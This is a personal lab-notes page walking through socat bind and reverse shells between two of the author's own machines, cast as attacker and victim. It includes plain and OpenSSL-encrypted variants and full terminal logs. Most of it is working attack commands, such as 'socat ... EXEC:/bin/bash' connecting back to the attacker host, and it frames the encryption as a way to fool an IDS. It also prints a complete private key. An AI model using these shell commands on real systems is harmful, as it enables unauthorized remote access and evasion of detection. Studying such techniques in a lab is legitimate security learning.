§2024-11-05
How to use socat in an imaginary scenario of attacker and victim, where we are trying to get a shell to the victim`s machine.
¶The IP setup
- Attack machine A: 192.168.48.239 , hc4Noble.yushei.net
- Victim machine B: 192.168.16.249, mail.yushei.net
- Bind Shell
In this scenario socat will listen to a port in the victim(kali machine) and wait for any new connection.
Victim B
alexlai@mail:~$ cat /home/alexlai/hello.txt
I am /home/alexlai/hello.txt
Hello!!
alexlai@mail:~$ socat -d -d TCP4-LISTEN:4443 EXEC:/bin/bash
2024/11/05 11:25:25 socat[39140] W ioctl(5, IOCTL_VM_SOCKETS_GET_LOCAL_CID, ...): Inappropriate ioctl for device
2024/11/05 11:25:25 socat[39140] N listening on AF=2 0.0.0.0:4443
2024/11/05 11:25:29 socat[39140] N accepting connection from AF=2 192.168.48.239:59534 on AF=2 192.168.16.249:4443
2024/11/05 11:25:29 socat[39140] N forking off child, using socket for reading and writing
2024/11/05 11:25:29 socat[39140] N forked off child process 39141
2024/11/05 11:25:29 socat[39140] N forked off child process 39141
2024/11/05 11:25:29 socat[39140] N starting data transfer loop with FDs [6,6] and [5,5]
2024/11/05 11:25:29 socat[39141] N execvp'ing "/bin/bash"
- Attack machine A,
alexlai@hc4Noble:~$ socat - TCP4:192.168.16.249:4443
# - here typically refers to standard input/output
cat
alexlai@hc4Noble:~$ socat - TCP4:192.168.16.249:4443
cat /home/alexlai/hello.txt
I am /home/alexlai/hello.txt
Hello!!
- Reverse Shell
- Victim B:
alexlai@mail:~$ socat TCP4:hc4Noble.yushei.net:4443 EXEC:/bin/bash
- Attack machine A:
alexlai@hc4Noble:~$ socat -d -d TCP4-LISTEN:4443 STDOUT
2024/11/05 12:58:44 socat[61643] N listening on AF=2 0.0.0.0:4443
pwd
2024/11/05 12:58:57 socat[61643] N accepting connection from AF=2 192.168.16.249:38538 on AF=2 192.168.48.239:4443
2024/11/05 12:58:57 socat[61643] W address is opened in read-write mode but only supports write-only
2024/11/05 12:58:57 socat[61643] N using stdout for reading and writing
2024/11/05 12:58:57 socat[61643] N starting data transfer loop with FDs [6,6] and [1,1]
2024/11/05 12:58:57 socat[61643] N write(6, 0xaaaab93b3000, 4) completed
/home/alexlai
2024/11/05 12:58:57 socat[61643] N write(1, 0xaaaab93b3000, 14) completed
ls
2024/11/05 12:59:08 socat[61643] N write(6, 0xaaaab93b3000, 3) completed
build
dump-db
hello.txt
scripts
2024/11/05 12:59:08 socat[61643] N write(1, 0xaaaab93b3000, 32) completed
cat hello.txt
2024/11/05 12:59:15 socat[61643] N write(6, 0xaaaab93b3000, 14) completed
I am /home/alexlai/hello.txt
Hello!!
2024/11/05 12:59:15 socat[61643] N write(1, 0xaaaab93b3000, 38) completed
- Encrypted Bind Shell
Lets assume now that we wish to encrypt our communication with the victim either due to we don't want anyone in the network to sniff the traffic or because there is an IDS in place and this way we could fool it.
We will use openssl encryption for this which is very easy to accomplish.
We will use openssl encryption for this which is very easy to accomplish. We start by generating a key and a certificate using the following command:
- attack machine A.
alexlai@hc4Noble:~$ mkdir socat && cd $_
alexlai@hc4Noble:~/socat$ openssl req -newkey rsa:2048 -nodes -keyout bind.key -x509 -days 1000 -subj '/CN=yushei.net/O=YuShei LTD./C=TW' -out bind.crt
alexlai@hc4Noble:~/socat$ ls
bind.crt bind.key
alexlai@hc4Noble:~/socat$ cat bind.key bind.crt > bind.pem
alexlai@hc4Noble:~/socat$ ls -l
total 12
-rw-rw-r-- 1 alexlai alexlai 1212 Nov 5 13:16 bind.crt
-rw------- 1 alexlai alexlai 1704 Nov 5 13:16 bind.key
-rw-rw-r-- 1 alexlai alexlai 2916 Nov 5 13:18 bind.pem
Since we intend to use a bind shell it should be clear that the bind.pem file need to be in the victims machine, so we can generate the bind.pem file in our attacker machine and then transfer it to the victim. The final command we need to run on the victims machine is the following:
- transfer binf.pem to Victim B machine
alexlai@mail:~$ mkdir ~/socat && cd $_
alexlai@mail:~/socat$ scp alexlai@hc4Noble.yushei.net:/home/alexlai/socat/bind.pem ./
alexlai@mail:~/socat$ ls -l
total 4
-rw-rw-r-- 1 alexlai alexlai 2916 Nov 5 13:25 bind.pem
- Setup the Victim machne B:
verify=0 no verify certificate
alexlai@mail:~/socat$ socat OPENSSL-LISTEN:4443,cert=bind.pem,verify=0,fork EXEC:/bin/bash
- Start up Attack Machine A:
alexlai@hc4Noble:~/socat$ socat - OPENSSL:192.168.16.249:4443,verify=0
2024/11/05 13:29:28 socat[61765] W refusing to set empty SNI host name
^Calexlai@hc4Noble:~/socat$ socat - OPENSSL:192.168.16.249:4443,verify=0
2024/11/05 13:29:58 socat[61766] W refusing to set empty SNI host name
ls
bind.pem
cat bind.pem
-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDExsAy5Ugae/DY
RAibJMUZH2rsLf1r+Oe0jiMuqex5SC+WcyB/yf+2nVvxK2GL7yOT3aiHFc9N7p59
Z99ZxgqbPDOCUkcwN9jmr6aQ5fnoPOKqxTRujZOuMPW0NEFe0yXezmDH/EhAH/WS
tVe8sPc4zVtRNftK0Y/vUGLeiEdaLXXuTvz9aXX+9v/p6SM//AKD8ZgY+mDOthTp
Y5s7rxIYXXdF/ukk03cdmc81idLLWSKAFM2twuH0DcLIdkJbi+6wR1/p5CeK9ZxY
QNLRoOi9T4TLkFZpKaAMxg/Y4/fzG0TyajTJEjGv+5DrzPVtPu4TrKLdA6hRkXQh
0KvguFXFAgMBAAECggEAAsSU7z3E+XJlJnWfrDlJL1KRYlFiuHkWjLZYRKHpQ30w
Bi0IHG0zZp/EUAf/LyBKcWVO8I+AsNvM1qMIsa5wLlOtvmCLVc4n31WvwWdz4lJD
Nom7T8o4B2+pubB56TVpItFVNS06Ac4MtYu7LzXdePQSiXnCxQA5WRX+hy1iImnb
OtoRZZwOOeef6AnWdFFGfsZo374j5LL1F8ZbYegUlEuLoCYQQFsoQGfoWkmwPwgl
ixiwxR+xMe5E7Rr+ZA/uQj3NkwpRutB2efF7ineOoKgG/BoX+ezeI4OUjEINNDjB
uyJkFXegRBxshV+0xeR15ehoIQMRRCpj1C9SatFz4QKBgQD4ROcmHz03OXO1xQQ3
BVBf4uhQZr3CEH4NWSvOyH7r5T9djeJ9MP5hE5HsBLtFiry6UtG6Z8tLewghvUz5
GwO7nVHPJY+6aRDQN0ab2v021Um+vJntA4PqoouqJzZqi1VCcjLFst+17th0HQxi
16lIevYQ98KPvhFzPZ6x7cxC+QKBgQDK5158tG6Kywdoi/PSR9ZLYKLdz3iBjMAU
xNspaAfoDJoEOQzg3eZLHzX5MZa+j/a84yFkQTJ9n8VmqYMpsp4CT0hKwCd2iYB3
hAxokRfJfcJaPDS2wEzd0EMHR/xAU8ASeqDwaldzsd7SM7t+WCXfBJMX6JJiidYX
lSC18+kQLQKBgHHYBrawdH2yVqDvavNf+G8/uY/EzRcEQQkV7sSvo6PAR8I6obUO
llclhjBYKxfEeq5l884qckp2bFAsYfOIs7mAdlcqvjGYpCEWd8ZYMOzH+T0BdwP8
LK2XQ7wOpyFMKxiBDU8iqvreP1tfRqK8id+2osc9FXacjZvukaq9hIDhAoGAEF/1
vyislyTldyl8RucnQzQMUMxSlFnwknyEl2Xe5XpG37pe8LLXyA4/w9mdqclih0Hp
Svb8BSlku/FINZBFsjgFxIqXZLiaFosgmTvEaK1uhuu+8VS5n1kUX70OfX6EzLj6
zgw2/I5JRjuIkRy6CbKL0G0jizJGheayGh0SHQ0CgYEAz/SIo7vCbw7EH8Ifa8ZS
xWhbVQdogE7THMjvdVWTxjGhMHb8pTzG/Q2ctLCP3UAiL4VRpfDDBatZJA62JkQZ
TKmeSxZqML4N/ZarZl+YKLStP4wQ5cX9y0vI9PUvJ2Vv3CdjQEV7/fCsbiUXqGRc
3zDOk/JBINlFVLa/1mLP2PQ=
-----END PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIDUTCCAjmgAwIBAgIUApBCTNQVsLxQjLsldYcTs/XPrEAwDQYJKoZIhvcNAQEL
BQAwODETMBEGA1UEAwwKeXVzaGVpLm5ldDEUMBIGA1UECgwLWXVTaGVpIExURC4x
CzAJBgNVBAYTAlRXMB4XDTI0MTEwNTA1MTYxNFoXDTI3MDgwMjA1MTYxNFowODET
MBEGA1UEAwwKeXVzaGVpLm5ldDEUMBIGA1UECgwLWXVTaGVpIExURC4xCzAJBgNV
BAYTAlRXMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxMbAMuVIGnvw
2EQImyTFGR9q7C39a/jntI4jLqnseUgvlnMgf8n/tp1b8Sthi+8jk92ohxXPTe6e
fWffWcYKmzwzglJHMDfY5q+mkOX56DziqsU0bo2TrjD1tDRBXtMl3s5gx/xIQB/1
krVXvLD3OM1bUTX7StGP71Bi3ohHWi117k78/Wl1/vb/6ekjP/wCg/GYGPpgzrYU
6WObO68SGF13Rf7pJNN3HZnPNYnSy1kigBTNrcLh9A3CyHZCW4vusEdf6eQnivWc
WEDS0aDovU+Ey5BWaSmgDMYP2OP38xtE8mo0yRIxr/uQ68z1bT7uE6yi3QOoUZF0
IdCr4LhVxQIDAQABo1MwUTAdBgNVHQ4EFgQUyvKCUnwP+19+2mXhe1/PT5n4Gvow
HwYDVR0jBBgwFoAUyvKCUnwP+19+2mXhe1/PT5n4GvowDwYDVR0TAQH/BAUwAwEB
/zANBgkqhkiG9w0BAQsFAAOCAQEATTQH4a8R+RR42L8hCFL3S0qOQ8U16unUMKPh
n1pqApFkuGPk+hVmUhW0bTlaWndVMqYQecBlsrOt/PtzkbfEoGRvu1xsYKPiThkl
zgcuNMQ/2v8ejPg7z1F0pQzMEKMfb633DKoQqNTA/1wyPLrMBgEkb+3i8GS4ANil
ZjZFHnP6vs26OqLJe+qpyJgwsPnhyZ8E2D2RzWwgTlETMvfLoAyN2hB72qFRFM6l
w/zpf7Zo1Zu6e0mJMmQGJWJ4udz+C/ev19F0mkAXo5qc9BIBV7APkRLNieIohic8
xNbmmo3kerIDPYZnP12D9BYCLi8Hq0hmrF7LT5UO1zBJA7ptzg==
-----END CERTIFICATE-----
- Encrypted Reverse Shell
- attacker Machine A,
alexlai@hc4Noble:~/socat$ socat -d -d OPENSSL-LISTEN:4443,cert=bind.pem,verify=0,fork STDOUT
2024/11/05 13:38:26 socat[61787] N listening on AF=10 [0000:0000:0000:0000:0000:0000:0000:0000]:4443
2024/11/05 13:40:19 socat[61787] N accepting connection from AF=10 [0000:0000:0000:0000:0000:ffff:c0a8:10f9]:47286 on AF=10 [0000:0000:0000:0000:0000:ffff:c0a8:30ef]:4443
2024/11/05 13:40:19 socat[61787] N forked off child process 61792
2024/11/05 13:40:19 socat[61787] N listening on AF=10 [0000:0000:0000:0000:0000:0000:0000:0000]:4443
2024/11/05 13:40:19 socat[61792] N no peer certificate and no check
2024/11/05 13:40:19 socat[61792] N SSL proto version used: TLSv1.3
2024/11/05 13:40:19 socat[61792] N SSL connection using TLS_AES_256_GCM_SHA384
2024/11/05 13:40:19 socat[61792] N SSL connection compression "none"
2024/11/05 13:40:19 socat[61792] N SSL connection expansion "none"
2024/11/05 13:40:19 socat[61792] W address is opened in read-write mode but only supports write-only
2024/11/05 13:40:19 socat[61792] N using stdout for reading and writing
2024/11/05 13:40:19 socat[61792] N starting data transfer loop with FDs [7,7] and [1,1]
ls
build
dump-db
hello.txt
scripts
socat
2024/11/05 13:40:24 socat[61792] N write(1, 0xaaaae8c0a000, 38) completed
cat hello.txt
I am /home/alexlai/hello.txt
Hello!!
2024/11/05 13:40:35 socat[61792] N write(1, 0xaaaae8c0a000, 38) completed
- Victim Machine B,
alexlai@mail:~$ socat OPENSSL:hc4Noble.yushei.net:4443,verify=0 EXEC:/bin/bash